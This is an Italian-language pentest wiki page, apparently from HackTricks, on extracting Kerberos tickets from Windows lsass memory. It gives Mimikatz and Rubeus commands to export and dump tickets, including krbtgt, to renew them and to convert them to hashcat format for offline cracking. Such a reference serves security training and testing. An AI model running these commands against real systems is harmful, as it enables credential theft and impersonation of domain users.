# Raccolta di ticket da Windows {{#include ../../banners/hacktricks-training.md}} I ticket in Windows sono gestiti e memorizzati dal processo **lsass** (Local Security Authority Subsystem Service), responsabile della gestione delle politiche di sicurezza. Per estrarre questi ticket, è necessario interfacciarsi con il processo lsass. Un utente non amministrativo può accedere solo ai propri ticket, mentre un amministratore ha il privilegio di estrarre tutti i ticket sul sistema. Per tali operazioni, gli strumenti **Mimikatz** e **Rubeus** sono ampiamente utilizzati, ciascuno con comandi e funzionalità diverse. ### Mimikatz Mimikatz è uno strumento versatile che può interagire con la sicurezza di Windows. Viene utilizzato non solo per estrarre ticket, ma anche per varie altre operazioni legate alla sicurezza. ```bash # Extracting tickets using Mimikatz sekurlsa::tickets /export ``` ### Rubeus Rubeus è uno strumento specificamente progettato per l'interazione e la manipolazione di Kerberos. Viene utilizzato per l'estrazione e la gestione dei ticket, così come per altre attività correlate a Kerberos. ```bash # Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid: /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) # Renewing a ticket .\Rubeus.exe renew /ticket: # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket: ``` Quando utilizzi questi comandi, assicurati di sostituire i segnaposto come `` e `` con il ticket codificato in Base64 e l'ID di accesso effettivi. Questi strumenti offrono funzionalità estese per gestire i ticket e interagire con i meccanismi di sicurezza di Windows. ## Riferimenti - [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) {{#include ../../banners/hacktricks-training.md}}